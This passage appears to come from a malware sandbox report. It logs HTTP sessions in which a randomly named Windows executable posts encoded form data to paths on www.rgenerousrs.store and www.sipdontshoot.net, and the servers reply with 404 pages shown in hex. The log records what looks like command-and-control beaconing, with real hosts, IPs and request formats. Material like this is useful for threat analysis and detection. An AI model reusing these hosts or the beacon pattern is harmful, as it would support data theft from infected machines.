                                                    Data Ascii: StWXF0Jx=BnRAa82SedvAaiCdhhaBc01bb6Vr6ZqdBnk39tv5KyMBfg0BX5FPXLzh/Mrv9GtrIU/9IhmsZ7+0vNVyKZ1S0lQynxY38AVBvxZgQnKEP8BT7F6ZTu4PlplaLwMKbFFE2PFHoStv/kLPb3YwRGKZ8cUqa4LyhA79qs2b41pRa3xwpZjbQ1vcifsQH8P0EYXQgyGT3tI=
                                                    Nov 21, 2024 16:18:03.856549978 CET | 1071 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:03 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jz0EPEM%2BKj9v9tGOK3%2FVVwcGi%2BJ8vi6PJxAk6rK2fmtcNrtXz1yNwq2gQ8QLllVHsM3yk8cVH5NNbdNSyNJjl3o20P8m531h%2FtfHM9Q9BeSRF8Mbd2bmCdi35tKDUZqGBe9unVZy95o%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a66edd48726b-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.5 | 49982 | 172.67.167.146 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:05.000088930 CET | 818 | OUT | POST /zr8v/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.rgenerousrs.store
                                                    Referer: http://www.rgenerousrs.store/zr8v/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 42 6e 52 41 61 38 32 53 65 64 76 41 63 41 57 64 74 68 6d 42 4e 55 31 59 58 61 56 72 6a 4a 71 5a 42 6e 59 33 39 73 71 30 4b 47 67 42 66 46 51 42 57 34 46 50 55 4c 7a 68 77 73 72 71 77 6d 74 61 49 55 79 43 49 6a 79 73 5a 37 61 30 76 4a 46 79 4b 71 74 56 32 31 51 30 73 52 59 78 79 67 56 42 76 78 5a 67 51 6e 75 39 50 2f 78 54 37 31 71 5a 53 4d 63 4d 6d 70 6c 56 4d 77 4d 4b 66 46 46 41 32 50 46 68 6f 58 51 4b 2f 69 48 50 62 30 4d 77 51 53 57 61 32 63 55 6f 5a 49 4b 31 67 51 65 78 70 50 65 75 39 32 38 6d 44 46 6c 73 68 50 53 78 4b 58 6e 30 78 2f 41 6f 58 76 48 44 56 6f 32 35 36 52 57 6a 70 36 65 35 49 53 57 4c 52 2b 6b 79 41 7a 77 46 47 54 7a 4b 49 46 5a 6a
                                                    Data Ascii: StWXF0Jx=BnRAa82SedvAcAWdthmBNU1YXaVrjJqZBnY39sq0KGgBfFQBW4FPULzhwsrqwmtaIUyCIjysZ7a0vJFyKqtV21Q0sRYxygVBvxZgQnu9P/xT71qZSMcMmplVMwMKfFFA2PFhoXQK/iHPb0MwQSWa2cUoZIK1gQexpPeu928mDFlshPSxKXn0x/AoXvHDVo256RWjp6e5ISWLR+kyAzwFGTzKIFZj
                                                    Nov 21, 2024 16:18:06.541604042 CET | 1073 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:06 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7SJR5PAu6Nvu2bnzCicAlwpGdhkyLevVIMEU5XJeExmwCLPFp1x0g%2B46%2BQQ1bw6Hh%2BMVbTqYUZAXKCbWSAind3tHQR9Gh3vVcR%2BmlZMGNx%2BfFg002IverXm51rusheP8qRBNebqohs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a67efcab0caa-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.5 | 49983 | 172.67.167.146 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:07.658329010 CET | 1835 | OUT | POST /zr8v/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.rgenerousrs.store
                                                    Referer: http://www.rgenerousrs.store/zr8v/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 42 6e 52 41 61 38 32 53 65 64 76 41 63 41 57 64 74 68 6d 42 4e 55 31 59 58 61 56 72 6a 4a 71 5a 42 6e 59 33 39 73 71 30 4b 47 6f 42 66 7a 63 42 57 62 39 50 62 72 7a 68 35 4d 72 72 77 6d 74 39 49 55 71 4f 49 6a 50 62 5a 35 79 30 75 75 74 79 62 4c 74 56 2f 31 51 30 6a 78 59 30 38 41 56 75 76 78 4a 73 51 6e 2b 39 50 2f 78 54 37 33 43 5a 56 65 34 4d 71 4a 6c 61 4c 77 4d 57 62 46 46 6b 32 50 4d 55 6f 57 42 2f 2f 53 6e 50 62 53 73 77 54 68 2b 61 77 4d 55 6d 63 49 4b 58 67 51 6a 7a 70 4f 79 55 39 31 67 4d 44 48 31 73 69 71 6e 4c 5a 32 37 35 72 4a 59 71 56 59 44 36 4a 50 76 63 2f 53 71 4e 73 4b 53 43 4d 32 43 2f 48 36 42 71 49 54 6c 77 54 53 4c 2b 41 69 70 69 63 33 53 49 4a 31 34 7a 67 4e 78 72 54 53 52 74 34 74 4a 6d 72 4d 7a 42 76 30 69 61 32 6a 73 6a 79 6c 39 57 37 63 57 37 42 75 4d 57 31 42 77 36 44 62 41 35 75 33 74 45 30 38 72 6b 77 50 57 57 45 32 61 31 42 76 35 69 4e 6c 6d 4e 74 65 52 54 63 52 43 68 45 33 33 58 30 39 73 77 63 77 64 49 54 4c 53 55 63 6f 49 77 5a 56 47 32 35 [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=BnRAa82SedvAcAWdthmBNU1YXaVrjJqZBnY39sq0KGoBfzcBWb9Pbrzh5Mrrwmt9IUqOIjPbZ5y0uutybLtV/1Q0jxY08AVuvxJsQn+9P/xT73CZVe4MqJlaLwMWbFFk2PMUoWB//SnPbSswTh+awMUmcIKXgQjzpOyU91gMDH1siqnLZ275rJYqVYD6JPvc/SqNsKSCM2C/H6BqITlwTSL+Aipic3SIJ14zgNxrTSRt4tJmrMzBv0ia2jsjyl9W7cW7BuMW1Bw6DbA5u3tE08rkwPWWE2a1Bv5iNlmNteRTcRChE33X09swcwdITLSUcoIwZVG25+QLAAF1tSZbGEm6Ledo/a6sJ2dsOoM3A1SBPLunnDQVT1u1dmY5bpuEYnXghz9wiYji2KzHBr5c25VZKREOGyeI9IuyKj7jzdQm/XQcmmLHiRZ8ZrZxCmSC9XSizVltTx9TQ2WuOGb/O6L4lndpe8pI7gGaQUDZdO34F9cnCOZMdKHC+jyAl1yJqEfmaATQ9TdIU/JG63IWwBZIs71eRohtXCAQscpBIcgySYZYHv1gQ7D7coDmu04ITv5NTqjFQBG99XLMdaZ5n64I8tz+hlwMa7uHM596sdH1+vsulQFC5L1tt5+QSKijYSsEgE+P3H88B52FnUeQ3J4VQvpzPW3c5wYv0119Br7QT1//W6FcN75Q1uFbkeobcSx9TG8pyV4/r2EpLxeIBBwWGdlN4BruYXmIfGe+lIJtbmEeToKogs5awjl8oYjuAXxQH3cX7v3oc4Q5ediXQxSBmDOaTqov9Dzr9a8rb35zya6lEjZVNTga0GhY2Ieej2aEvh+v+OaqTffDoUSf5EzJA6Cgj5sIbmayWxLjvo3ljnWNAMtH1tBpftZIGFCYPPz4o5BOO7aOcqH7ot/a82j7Q7kpRap8aFY3EV5GabK8HTS1F1abdNNkNMPUfdhx3I0+uRyNMlC4YWdpLwPtSV46KJ7Q5M1rfUBY8f5LUwl [TRUNCATED]
                                                    Nov 21, 2024 16:18:09.181600094 CET | 1071 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:09 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z218R7hiMB%2FYE5GRs6PzgTsug9LauZH6l7NfPiZmk1pwEO2zIcMHtaDTijsKGS57hvq6rfdpXZL2jz6LMNizXemOOukA4fV3aU1Y5ayEvimSSCBHYCG6ax6aYeBoDqNDgPFqvpCu9o0%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6901ae743a4-EWR
                                                    Content-Encoding: gzip
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2248&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.5 | 49984 | 172.67.167.146 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:10.330718994 CET | 532 | OUT | GET /zr8v/?zfI=jXEDeV4Xp62&StWXF0Jx=Ml5gZJW5QcanJzzDoQq3UEdCVeZH9JbjcVoAzcC8IkgnBjkPfLtOabWm5tXm+g1ABEyKJ0nQQaWBnIlmZ5M263kDoloi41FTqGteT0eMG8ZHw0bPQeAXlqBGUQENUFkujA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.rgenerousrs.store
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:11.890003920 CET | 1082 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:11 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9smxA9CAoaDJkDaO48BC%2BUe5cRz1tAvAZqVhqHryPAkE47hpOwHBJpqZk51nyDpkWVNChxXgw2G%2FqTGHwiCQ4uL6mksdLI8406OwZflfmWwitfoH9naUDE25UZ9Eq4Eyg%2BwB5DYaoo%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e61a6a0dfcc41e9-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=532&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                    Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                    Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                                                    Nov 21, 2024 16:18:11.891117096 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.5 | 49985 | 216.40.34.41 | 80 | 6308 | C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Nov 21, 2024 16:18:17.907258034 CET | 795 | OUT | POST /ejy6/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.sipdontshoot.net
                                                    Referer: http://www.sipdontshoot.net/ejy6/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 71 49 46 72 68 36 44 48 64 69 79 49 33 4d 54 43 4e 63 4c 52 31 4c 58 34 6d 63 44 71 36 78 37 44 66 30 58 42 6b 48 53 78 6c 35 42 65 41 42 66 4f 7a 58 6c 53 6e 47 44 4c 53 37 69 30 37 45 66 35 63 72 55 65 6f 6f 2f 56 36 58 35 6e 59 32 6c 7a 69 62 36 58 6d 68 35 63 44 67 33 65 77 33 4b 4a 4c 57 53 47 59 4a 53 72 38 49 39 7a 75 54 6d 39 35 48 67 30 6b 62 4c 6c 6f 53 39 46 67 6f 36 62 64 52 79 52 42 4a 4c 44 42 45 55 4c 6a 55 6a 4e 45 2b 31 2f 69 57 58 2b 52 63 56 67 63 4c 64 54 41 44 4a 78 66 4f 76 59 30 4d 45 48 55 36 30 39 64 38 6d 4d 6a 77 75 64 71 6f 71 69 50 6a 53 47 54 78 31 4d 63 43 6b 3d
                                                    Data Ascii: StWXF0Jx=qIFrh6DHdiyI3MTCNcLR1LX4mcDq6x7Df0XBkHSxl5BeABfOzXlSnGDLS7i07Ef5crUeoo/V6X5nY2lzib6Xmh5cDg3ew3KJLWSGYJSr8I9zuTm95Hg0kbLloS9Fgo6bdRyRBJLDBEULjUjNE+1/iWX+RcVgcLdTADJxfOvY0MEHU609d8mMjwudqoqiPjSGTx1McCk=
                                                    Nov 21, 2024 16:18:19.133342981 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html; charset=UTF-8
                                                    x-request-id: 10aad33d-bb1a-4529-b4ba-eb15a1f9f864
                                                    x-runtime: 0.025302
                                                    content-length: 17147
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                    Nov 21, 2024 16:18:19.133421898 CET | 1236 | IN | Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                    Nov 21, 2024 16:18:19.133477926 CET | 1236 | IN | Data Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                    Nov 21, 2024 16:18:19.133533001 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                    Nov 21, 2024 16:18:19.133568048 CET | 1236 | IN | Data Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                    Nov 21, 2024 16:18:19.133603096 CET | 1236 | IN | Data Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                    Nov 21, 2024 16:18:19.133637905 CET | 776 | IN | Data Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                    Nov 21, 2024 16:18:19.133673906 CET1236INData Raw: 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 37 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65
